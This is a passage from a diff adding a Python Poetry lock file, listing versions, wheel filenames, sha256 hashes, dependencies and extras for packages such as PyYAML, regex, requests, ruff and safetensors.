+ {file = "PyYAML-6.0.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9056c1ecd25795207ad294bcf39f2db3d845767be0ea6e6a34d856f006006083"},
+ {file = "PyYAML-6.0.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:82d09873e40955485746739bcb8b4586983670466c23382c19cffecbf1fd8706"},
+ {file = "PyYAML-6.0.2-cp38-cp38-win32.whl", hash = "sha256:43fa96a3ca0d6b1812e01ced1044a003533c47f6ee8aca31724f78e93ccc089a"},
+ {file = "PyYAML-6.0.2-cp38-cp38-win_amd64.whl", hash = "sha256:01179a4a8559ab5de078078f37e5c1a30d76bb88519906844fd7bdea1b7729ff"},
+ {file = "PyYAML-6.0.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:688ba32a1cffef67fd2e9398a2efebaea461578b0923624778664cc1c914db5d"},
+ {file = "PyYAML-6.0.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:a8786accb172bd8afb8be14490a16625cbc387036876ab6ba70912730faf8e1f"},
+ {file = "PyYAML-6.0.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d8e03406cac8513435335dbab54c0d385e4a49e4945d2909a581c83647ca0290"},
+ {file = "PyYAML-6.0.2-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f753120cb8181e736c57ef7636e83f31b9c0d1722c516f7e86cf15b7aa57ff12"},
+ {file = "PyYAML-6.0.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3b1fdb9dc17f5a7677423d508ab4f243a726dea51fa5e70992e59a7411c89d19"},
+ {file = "PyYAML-6.0.2-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:0b69e4ce7a131fe56b7e4d770c67429700908fc0752af059838b1cfb41960e4e"},
+ {file = "PyYAML-6.0.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:a9f8c2e67970f13b16084e04f134610fd1d374bf477b17ec1599185cf611d725"},
+ {file = "PyYAML-6.0.2-cp39-cp39-win32.whl", hash = "sha256:6395c297d42274772abc367baaa79683958044e5d3835486c16da75d2a694631"},
+ {file = "PyYAML-6.0.2-cp39-cp39-win_amd64.whl", hash = "sha256:39693e1f8320ae4f43943590b49779ffb98acb81f788220ea932a6b6c51004d8"},
+ {file = "pyyaml-6.0.2.tar.gz", hash = "sha256:d584d9ec91ad65861cc08d42e834324ef890a082e591037abe114850ff7bbc3e"},
+]
+
+[[package]]
+name = "pyyaml-env-tag"
+version = "0.1"
+description = "A custom YAML tag for referencing environment variables in YAML files. "
+optional = false
+python-versions = ">=3.6"
+files = [
+ {file = "pyyaml_env_tag-0.1-py3-none-any.whl", hash = "sha256:af31106dec8a4d68c60207c1886031cbf839b68aa7abccdb19868200532c2069"},
+ {file = "pyyaml_env_tag-0.1.tar.gz", hash = "sha256:70092675bda14fdec33b31ba77e7543de9ddc88f2e5b99160396572d11525bdb"},
+]
+
+[package.dependencies]
+pyyaml = "*"
+
+[[package]]
+name = "regex"
+version = "2024.11.6"
+description = "Alternative regular expression module, to replace re."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "regex-2024.11.6-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:ff590880083d60acc0433f9c3f713c51f7ac6ebb9adf889c79a261ecf541aa91"},
+ {file = "regex-2024.11.6-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:658f90550f38270639e83ce492f27d2c8d2cd63805c65a13a14d36ca126753f0"},
+ {file = "regex-2024.11.6-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:164d8b7b3b4bcb2068b97428060b2a53be050085ef94eca7f240e7947f1b080e"},
+ {file = "regex-2024.11.6-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d3660c82f209655a06b587d55e723f0b813d3a7db2e32e5e7dc64ac2a9e86fde"},
+ {file = "regex-2024.11.6-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:d22326fcdef5e08c154280b71163ced384b428343ae16a5ab2b3354aed12436e"},
+ {file = "regex-2024.11.6-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f1ac758ef6aebfc8943560194e9fd0fa18bcb34d89fd8bd2af18183afd8da3a2"},
+ {file = "regex-2024.11.6-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:997d6a487ff00807ba810e0f8332c18b4eb8d29463cfb7c820dc4b6e7562d0cf"},
+ {file = "regex-2024.11.6-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:02a02d2bb04fec86ad61f3ea7f49c015a0681bf76abb9857f945d26159d2968c"},
+ {file = "regex-2024.11.6-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:f02f93b92358ee3f78660e43b4b0091229260c5d5c408d17d60bf26b6c900e86"},
+ {file = "regex-2024.11.6-cp310-cp310-musllinux_1_2_aarch64.whl", hash = "sha256:06eb1be98df10e81ebaded73fcd51989dcf534e3c753466e4b60c4697a003b67"},
+ {file = "regex-2024.11.6-cp310-cp310-musllinux_1_2_i686.whl", hash = "sha256:040df6fe1a5504eb0f04f048e6d09cd7c7110fef851d7c567a6b6e09942feb7d"},
+ {file = "regex-2024.11.6-cp310-cp310-musllinux_1_2_ppc64le.whl", hash = "sha256:fdabbfc59f2c6edba2a6622c647b716e34e8e3867e0ab975412c5c2f79b82da2"},
+ {file = "regex-2024.11.6-cp310-cp310-musllinux_1_2_s390x.whl", hash = "sha256:8447d2d39b5abe381419319f942de20b7ecd60ce86f16a23b0698f22e1b70008"},
+ {file = "regex-2024.11.6-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:da8f5fc57d1933de22a9e23eec290a0d8a5927a5370d24bda9a6abe50683fe62"},
+ {file = "regex-2024.11.6-cp310-cp310-win32.whl", hash = "sha256:b489578720afb782f6ccf2840920f3a32e31ba28a4b162e13900c3e6bd3f930e"},
+ {file = "regex-2024.11.6-cp310-cp310-win_amd64.whl", hash = "sha256:5071b2093e793357c9d8b2929dfc13ac5f0a6c650559503bb81189d0a3814519"},
+ {file = "regex-2024.11.6-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:5478c6962ad548b54a591778e93cd7c456a7a29f8eca9c49e4f9a806dcc5d638"},
+ {file = "regex-2024.11.6-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:2c89a8cc122b25ce6945f0423dc1352cb9593c68abd19223eebbd4e56612c5b7"},
+ {file = "regex-2024.11.6-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:94d87b689cdd831934fa3ce16cc15cd65748e6d689f5d2b8f4f4df2065c9fa20"},
+ {file = "regex-2024.11.6-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1062b39a0a2b75a9c694f7a08e7183a80c63c0d62b301418ffd9c35f55aaa114"},
+ {file = "regex-2024.11.6-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:167ed4852351d8a750da48712c3930b031f6efdaa0f22fa1933716bfcd6bf4a3"},
+ {file = "regex-2024.11.6-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2d548dafee61f06ebdb584080621f3e0c23fff312f0de1afc776e2a2ba99a74f"},
+ {file = "regex-2024.11.6-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f2a19f302cd1ce5dd01a9099aaa19cae6173306d1302a43b627f62e21cf18ac0"},
+ {file = "regex-2024.11.6-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:bec9931dfb61ddd8ef2ebc05646293812cb6b16b60cf7c9511a832b6f1854b55"},
+ {file = "regex-2024.11.6-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:9714398225f299aa85267fd222f7142fcb5c769e73d7733344efc46f2ef5cf89"},
+ {file = "regex-2024.11.6-cp311-cp311-musllinux_1_2_i686.whl", hash = "sha256:202eb32e89f60fc147a41e55cb086db2a3f8cb82f9a9a88440dcfc5d37faae8d"},
+ {file = "regex-2024.11.6-cp311-cp311-musllinux_1_2_ppc64le.whl", hash = "sha256:4181b814e56078e9b00427ca358ec44333765f5ca1b45597ec7446d3a1ef6e34"},
+ {file = "regex-2024.11.6-cp311-cp311-musllinux_1_2_s390x.whl", hash = "sha256:068376da5a7e4da51968ce4c122a7cd31afaaec4fccc7856c92f63876e57b51d"},
+ {file = "regex-2024.11.6-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:ac10f2c4184420d881a3475fb2c6f4d95d53a8d50209a2500723d831036f7c45"},
+ {file = "regex-2024.11.6-cp311-cp311-win32.whl", hash = "sha256:c36f9b6f5f8649bb251a5f3f66564438977b7ef8386a52460ae77e6070d309d9"},
+ {file = "regex-2024.11.6-cp311-cp311-win_amd64.whl", hash = "sha256:02e28184be537f0e75c1f9b2f8847dc51e08e6e171c6bde130b2687e0c33cf60"},
+ {file = "regex-2024.11.6-cp312-cp312-macosx_10_13_universal2.whl", hash = "sha256:52fb28f528778f184f870b7cf8f225f5eef0a8f6e3778529bdd40c7b3920796a"},
+ {file = "regex-2024.11.6-cp312-cp312-macosx_10_13_x86_64.whl", hash = "sha256:fdd6028445d2460f33136c55eeb1f601ab06d74cb3347132e1c24250187500d9"},
+ {file = "regex-2024.11.6-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:805e6b60c54bf766b251e94526ebad60b7de0c70f70a4e6210ee2891acb70bf2"},
+ {file = "regex-2024.11.6-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b85c2530be953a890eaffde05485238f07029600e8f098cdf1848d414a8b45e4"},
+ {file = "regex-2024.11.6-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:bb26437975da7dc36b7efad18aa9dd4ea569d2357ae6b783bf1118dabd9ea577"},
+ {file = "regex-2024.11.6-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:abfa5080c374a76a251ba60683242bc17eeb2c9818d0d30117b4486be10c59d3"},
+ {file = "regex-2024.11.6-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:70b7fa6606c2881c1db9479b0eaa11ed5dfa11c8d60a474ff0e095099f39d98e"},
+ {file = "regex-2024.11.6-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0c32f75920cf99fe6b6c539c399a4a128452eaf1af27f39bce8909c9a3fd8cbe"},
+ {file = "regex-2024.11.6-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:982e6d21414e78e1f51cf595d7f321dcd14de1f2881c5dc6a6e23bbbbd68435e"},
+ {file = "regex-2024.11.6-cp312-cp312-musllinux_1_2_i686.whl", hash = "sha256:a7c2155f790e2fb448faed6dd241386719802296ec588a8b9051c1f5c481bc29"},
+ {file = "regex-2024.11.6-cp312-cp312-musllinux_1_2_ppc64le.whl", hash = "sha256:149f5008d286636e48cd0b1dd65018548944e495b0265b45e1bffecce1ef7f39"},
+ {file = "regex-2024.11.6-cp312-cp312-musllinux_1_2_s390x.whl", hash = "sha256:e5364a4502efca094731680e80009632ad6624084aff9a23ce8c8c6820de3e51"},
+ {file = "regex-2024.11.6-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:0a86e7eeca091c09e021db8eb72d54751e527fa47b8d5787caf96d9831bd02ad"},
+ {file = "regex-2024.11.6-cp312-cp312-win32.whl", hash = "sha256:32f9a4c643baad4efa81d549c2aadefaeba12249b2adc5af541759237eee1c54"},
+ {file = "regex-2024.11.6-cp312-cp312-win_amd64.whl", hash = "sha256:a93c194e2df18f7d264092dc8539b8ffb86b45b899ab976aa15d48214138e81b"},
+ {file = "regex-2024.11.6-cp313-cp313-macosx_10_13_universal2.whl", hash = "sha256:a6ba92c0bcdf96cbf43a12c717eae4bc98325ca3730f6b130ffa2e3c3c723d84"},
+ {file = "regex-2024.11.6-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:525eab0b789891ac3be914d36893bdf972d483fe66551f79d3e27146191a37d4"},
+ {file = "regex-2024.11.6-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:086a27a0b4ca227941700e0b31425e7a28ef1ae8e5e05a33826e17e47fbfdba0"},
+ {file = "regex-2024.11.6-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bde01f35767c4a7899b7eb6e823b125a64de314a8ee9791367c9a34d56af18d0"},
+ {file = "regex-2024.11.6-cp313-cp313-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b583904576650166b3d920d2bcce13971f6f9e9a396c673187f49811b2769dc7"},
+ {file = "regex-2024.11.6-cp313-cp313-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:1c4de13f06a0d54fa0d5ab1b7138bfa0d883220965a29616e3ea61b35d5f5fc7"},
+ {file = "regex-2024.11.6-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3cde6e9f2580eb1665965ce9bf17ff4952f34f5b126beb509fee8f4e994f143c"},
+ {file = "regex-2024.11.6-cp313-cp313-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0d7f453dca13f40a02b79636a339c5b62b670141e63efd511d3f8f73fba162b3"},
+ {file = "regex-2024.11.6-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:59dfe1ed21aea057a65c6b586afd2a945de04fc7db3de0a6e3ed5397ad491b07"},
+ {file = "regex-2024.11.6-cp313-cp313-musllinux_1_2_i686.whl", hash = "sha256:b97c1e0bd37c5cd7902e65f410779d39eeda155800b65fc4d04cc432efa9bc6e"},
+ {file = "regex-2024.11.6-cp313-cp313-musllinux_1_2_ppc64le.whl", hash = "sha256:f9d1e379028e0fc2ae3654bac3cbbef81bf3fd571272a42d56c24007979bafb6"},
+ {file = "regex-2024.11.6-cp313-cp313-musllinux_1_2_s390x.whl", hash = "sha256:13291b39131e2d002a7940fb176e120bec5145f3aeb7621be6534e46251912c4"},
+ {file = "regex-2024.11.6-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:4f51f88c126370dcec4908576c5a627220da6c09d0bff31cfa89f2523843316d"},
+ {file = "regex-2024.11.6-cp313-cp313-win32.whl", hash = "sha256:63b13cfd72e9601125027202cad74995ab26921d8cd935c25f09c630436348ff"},
+ {file = "regex-2024.11.6-cp313-cp313-win_amd64.whl", hash = "sha256:2b3361af3198667e99927da8b84c1b010752fa4b1115ee30beaa332cabc3ef1a"},
+ {file = "regex-2024.11.6-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:3a51ccc315653ba012774efca4f23d1d2a8a8f278a6072e29c7147eee7da446b"},
+ {file = "regex-2024.11.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ad182d02e40de7459b73155deb8996bbd8e96852267879396fb274e8700190e3"},
+ {file = "regex-2024.11.6-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:ba9b72e5643641b7d41fa1f6d5abda2c9a263ae835b917348fc3c928182ad467"},
+ {file = "regex-2024.11.6-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:40291b1b89ca6ad8d3f2b82782cc33807f1406cf68c8d440861da6304d8ffbbd"},
+ {file = "regex-2024.11.6-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:cdf58d0e516ee426a48f7b2c03a332a4114420716d55769ff7108c37a09951bf"},
+ {file = "regex-2024.11.6-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:a36fdf2af13c2b14738f6e973aba563623cb77d753bbbd8d414d18bfaa3105dd"},
+ {file = "regex-2024.11.6-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d1cee317bfc014c2419a76bcc87f071405e3966da434e03e13beb45f8aced1a6"},
+ {file = "regex-2024.11.6-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:50153825ee016b91549962f970d6a4442fa106832e14c918acd1c8e479916c4f"},
+ {file = "regex-2024.11.6-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:ea1bfda2f7162605f6e8178223576856b3d791109f15ea99a9f95c16a7636fb5"},
+ {file = "regex-2024.11.6-cp38-cp38-musllinux_1_2_aarch64.whl", hash = "sha256:df951c5f4a1b1910f1a99ff42c473ff60f8225baa1cdd3539fe2819d9543e9df"},
+ {file = "regex-2024.11.6-cp38-cp38-musllinux_1_2_i686.whl", hash = "sha256:072623554418a9911446278f16ecb398fb3b540147a7828c06e2011fa531e773"},
+ {file = "regex-2024.11.6-cp38-cp38-musllinux_1_2_ppc64le.whl", hash = "sha256:f654882311409afb1d780b940234208a252322c24a93b442ca714d119e68086c"},
+ {file = "regex-2024.11.6-cp38-cp38-musllinux_1_2_s390x.whl", hash = "sha256:89d75e7293d2b3e674db7d4d9b1bee7f8f3d1609428e293771d1a962617150cc"},
+ {file = "regex-2024.11.6-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:f65557897fc977a44ab205ea871b690adaef6b9da6afda4790a2484b04293a5f"},
+ {file = "regex-2024.11.6-cp38-cp38-win32.whl", hash = "sha256:6f44ec28b1f858c98d3036ad5d7d0bfc568bdd7a74f9c24e25f41ef1ebfd81a4"},
+ {file = "regex-2024.11.6-cp38-cp38-win_amd64.whl", hash = "sha256:bb8f74f2f10dbf13a0be8de623ba4f9491faf58c24064f32b65679b021ed0001"},
+ {file = "regex-2024.11.6-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:5704e174f8ccab2026bd2f1ab6c510345ae8eac818b613d7d73e785f1310f839"},
+ {file = "regex-2024.11.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:220902c3c5cc6af55d4fe19ead504de80eb91f786dc102fbd74894b1551f095e"},
+ {file = "regex-2024.11.6-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:5e7e351589da0850c125f1600a4c4ba3c722efefe16b297de54300f08d734fbf"},
+ {file = "regex-2024.11.6-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5056b185ca113c88e18223183aa1a50e66507769c9640a6ff75859619d73957b"},
+ {file = "regex-2024.11.6-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2e34b51b650b23ed3354b5a07aab37034d9f923db2a40519139af34f485f77d0"},
+ {file = "regex-2024.11.6-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5670bce7b200273eee1840ef307bfa07cda90b38ae56e9a6ebcc9f50da9c469b"},
+ {file = "regex-2024.11.6-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:08986dce1339bc932923e7d1232ce9881499a0e02925f7402fb7c982515419ef"},
+ {file = "regex-2024.11.6-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:93c0b12d3d3bc25af4ebbf38f9ee780a487e8bf6954c115b9f015822d3bb8e48"},
+ {file = "regex-2024.11.6-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:764e71f22ab3b305e7f4c21f1a97e1526a25ebdd22513e251cf376760213da13"},
+ {file = "regex-2024.11.6-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:f056bf21105c2515c32372bbc057f43eb02aae2fda61052e2f7622c801f0b4e2"},
+ {file = "regex-2024.11.6-cp39-cp39-musllinux_1_2_i686.whl", hash = "sha256:69ab78f848845569401469da20df3e081e6b5a11cb086de3eed1d48f5ed57c95"},
+ {file = "regex-2024.11.6-cp39-cp39-musllinux_1_2_ppc64le.whl", hash = "sha256:86fddba590aad9208e2fa8b43b4c098bb0ec74f15718bb6a704e3c63e2cef3e9"},
+ {file = "regex-2024.11.6-cp39-cp39-musllinux_1_2_s390x.whl", hash = "sha256:684d7a212682996d21ca12ef3c17353c021fe9de6049e19ac8481ec35574a70f"},
+ {file = "regex-2024.11.6-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:a03e02f48cd1abbd9f3b7e3586d97c8f7a9721c436f51a5245b3b9483044480b"},
+ {file = "regex-2024.11.6-cp39-cp39-win32.whl", hash = "sha256:41758407fc32d5c3c5de163888068cfee69cb4c2be844e7ac517a52770f9af57"},
+ {file = "regex-2024.11.6-cp39-cp39-win_amd64.whl", hash = "sha256:b2837718570f95dd41675328e111345f9b7095d821bac435aac173ac80b19983"},
+ {file = "regex-2024.11.6.tar.gz", hash = "sha256:7ab159b063c52a0333c884e4679f8d7a85112ee3078fe3d9004b2dd875585519"},
+]
+
+[[package]]
+name = "requests"
+version = "2.32.3"
+description = "Python HTTP for Humans."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "requests-2.32.3-py3-none-any.whl", hash = "sha256:70761cfe03c773ceb22aa2f671b4757976145175cdfca038c02654d061d6dcc6"},
+ {file = "requests-2.32.3.tar.gz", hash = "sha256:55365417734eb18255590a9ff9eb97e9e1da868d4ccd6402399eaf68af20a760"},
+]
+
+[package.dependencies]
+certifi = ">=2017.4.17"
+charset-normalizer = ">=2,<4"
+idna = ">=2.5,<4"
+urllib3 = ">=1.21.1,<3"
+
+[package.extras]
+socks = ["PySocks (>=1.5.6,!=1.5.7)"]
+use-chardet-on-py3 = ["chardet (>=3.0.2,<6)"]
+
+[[package]]
+name = "ruff"
+version = "0.1.15"
+description = "An extremely fast Python linter and code formatter, written in Rust."
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "ruff-0.1.15-py3-none-macosx_10_12_x86_64.macosx_11_0_arm64.macosx_10_12_universal2.whl", hash = "sha256:5fe8d54df166ecc24106db7dd6a68d44852d14eb0729ea4672bb4d96c320b7df"},
+ {file = "ruff-0.1.15-py3-none-macosx_10_12_x86_64.whl", hash = "sha256:6f0bfbb53c4b4de117ac4d6ddfd33aa5fc31beeaa21d23c45c6dd249faf9126f"},
+ {file = "ruff-0.1.15-py3-none-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e0d432aec35bfc0d800d4f70eba26e23a352386be3a6cf157083d18f6f5881c8"},
+ {file = "ruff-0.1.15-py3-none-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:9405fa9ac0e97f35aaddf185a1be194a589424b8713e3b97b762336ec79ff807"},
+ {file = "ruff-0.1.15-py3-none-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c66ec24fe36841636e814b8f90f572a8c0cb0e54d8b5c2d0e300d28a0d7bffec"},
+ {file = "ruff-0.1.15-py3-none-manylinux_2_17_ppc64.manylinux2014_ppc64.whl", hash = "sha256:6f8ad828f01e8dd32cc58bc28375150171d198491fc901f6f98d2a39ba8e3ff5"},
+ {file = "ruff-0.1.15-py3-none-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:86811954eec63e9ea162af0ffa9f8d09088bab51b7438e8b6488b9401863c25e"},
+ {file = "ruff-0.1.15-py3-none-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:fd4025ac5e87d9b80e1f300207eb2fd099ff8200fa2320d7dc066a3f4622dc6b"},
+ {file = "ruff-0.1.15-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b17b93c02cdb6aeb696effecea1095ac93f3884a49a554a9afa76bb125c114c1"},
+ {file = "ruff-0.1.15-py3-none-musllinux_1_2_aarch64.whl", hash = "sha256:ddb87643be40f034e97e97f5bc2ef7ce39de20e34608f3f829db727a93fb82c5"},
+ {file = "ruff-0.1.15-py3-none-musllinux_1_2_armv7l.whl", hash = "sha256:abf4822129ed3a5ce54383d5f0e964e7fef74a41e48eb1dfad404151efc130a2"},
+ {file = "ruff-0.1.15-py3-none-musllinux_1_2_i686.whl", hash = "sha256:6c629cf64bacfd136c07c78ac10a54578ec9d1bd2a9d395efbee0935868bf852"},
+ {file = "ruff-0.1.15-py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:1bab866aafb53da39c2cadfb8e1c4550ac5340bb40300083eb8967ba25481447"},
+ {file = "ruff-0.1.15-py3-none-win32.whl", hash = "sha256:2417e1cb6e2068389b07e6fa74c306b2810fe3ee3476d5b8a96616633f40d14f"},
+ {file = "ruff-0.1.15-py3-none-win_amd64.whl", hash = "sha256:3837ac73d869efc4182d9036b1405ef4c73d9b1f88da2413875e34e0d6919587"},
+ {file = "ruff-0.1.15-py3-none-win_arm64.whl", hash = "sha256:9a933dfb1c14ec7a33cceb1e49ec4a16b51ce3c20fd42663198746efc0427360"},
+ {file = "ruff-0.1.15.tar.gz", hash = "sha256:f6dfa8c1b21c913c326919056c390966648b680966febcb796cc9d1aaab8564e"},
+]
+
+[[package]]
+name = "safetensors"
+version = "0.5.1"
+description = ""
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "safetensors-0.5.1-cp38-abi3-macosx_10_12_x86_64.whl", hash = "sha256:5480b078590dd37ee1c27f153e1ee9a274b62b30871ee16c412d11341215f305"},
+ {file = "safetensors-0.5.1-cp38-abi3-macosx_11_0_arm64.whl", hash = "sha256:547e9fe8f3c9c50caf07cfcb6d2392f511853f7041821812ba73a05a915e91dd"},
+ {file = "safetensors-0.5.1-cp38-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2e98f5dbce744a87a8d2cb9147558e80af79cfe31aa4321554e1db0e49d9c957"},
+ {file = "safetensors-0.5.1-cp38-abi3-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:c40ef845cca82e365b46e192b7b4952082952d5965c602e030a73155336de89c"},
+ {file = "safetensors-0.5.1-cp38-abi3-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3cb212b0cded22fa0e46bca248beecf2fd079f2dffd7cc04e116a8b0128ae601"},
+ {file = "safetensors-0.5.1-cp38-abi3-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:4abb7bcf2faba63a0b58a2c6fafab0200726727ab6f579a1155239927a792709"},
+ {file = "safetensors-0.5.1-cp38-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:83a384e49b38c3ae3c02a52437548351af83029dff85fe3d1acd5b2cf06867bb"},
+ {file = "safetensors-0.5.1-cp38-abi3-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:44946151b01083fe5863c20d626f6ed9f1544be80e3bb2177a7ec27f911fdbf8"},
+ {file = "safetensors-0.5.1-cp38-abi3-musllinux_1_2_aarch64.whl", hash = "sha256:168e7a032c944eb5aefaee0d4bf4e15e84dbbf0f2ef86fbe0dc778a68306fff8"},
+ {file = "safetensors-0.5.1-cp38-abi3-musllinux_1_2_armv7l.whl", hash = "sha256:430b7eab6b4139bee8587522f264f7eebbac3e41614b52e35caf90affe7e7972"},
+ {file = "safetensors-0.5.1-cp38-abi3-musllinux_1_2_i686.whl", hash = "sha256:97f548d6e9f86d3326ab8416303f9ae1ded15df126b87db42658c3d89a1040d7"},
+ {file = "safetensors-0.5.1-cp38-abi3-musllinux_1_2_x86_64.whl", hash = "sha256:b021cad4af26677e0d3fbc5c8e2dfc3087ac44a3e0450576cbe0aa165849578c"},
+ {file = "safetensors-0.5.1-cp38-abi3-win32.whl", hash = "sha256:7290f8acdf1e5b5daf6101d6eed506d1f6ad66d08ca9f26235372befba7e2285"},
+ {file = "safetensors-0.5.1-cp38-abi3-win_amd64.whl", hash = "sha256:895f33c8ee55310606a407f45de3468ec0ffe259ba53cc0d4024a64fb58a1fc9"},
+ {file = "safetensors-0.5.1.tar.gz", hash = "sha256:75927919a73b0f34d6943b531d757f724e65797a900d88d8081fe8b4448eadc3"},
+]
+
+[package.extras]
+all = ["safetensors[jax]", "safetensors[numpy]", "safetensors[paddlepaddle]", "safetensors[pinned-tf]", "safetensors[quality]", "safetensors[testing]", "safetensors[torch]"]
+dev = ["safetensors[all]"]
+jax = ["flax (>=0.6.3)", "jax (>=0.3.25)", "jaxlib (>=0.3.25)", "safetensors[numpy]"]
+mlx = ["mlx (>=0.0.9)"]
+numpy = ["numpy (>=1.21.6)"]
+paddlepaddle = ["paddlepaddle (>=2.4.1)", "safetensors[numpy]"]
+pinned-tf = ["safetensors[numpy]", "tensorflow (==2.18.0)"]
+quality = ["black (==22.3)", "click (==8.0.4)", "flake8 (>=3.8.3)", "isort (>=5.5.4)"]
+tensorflow = ["safetensors[numpy]", "tensorflow (>=2.11.0)"]
+testing = ["h5py (>=3.7.0)", "huggingface-hub (>=0.12.1)", "hypothesis (>=6.70.2)", "pytest (>=7.2.0)", "pytest-benchmark (>=4.0.0)", "safetensors[numpy]", "setuptools-rust (>=1.5.2)"]
+torch = ["safetensors[numpy]", "torch (>=1.10)"]
+
+[[package]]
+name = "scipy"
+version = "1.10.1"
+description = "Fundamental algorithms for scientific computing in Python"
+optional = false
+python-versions = "<3.12,>=3.8"
+files = [
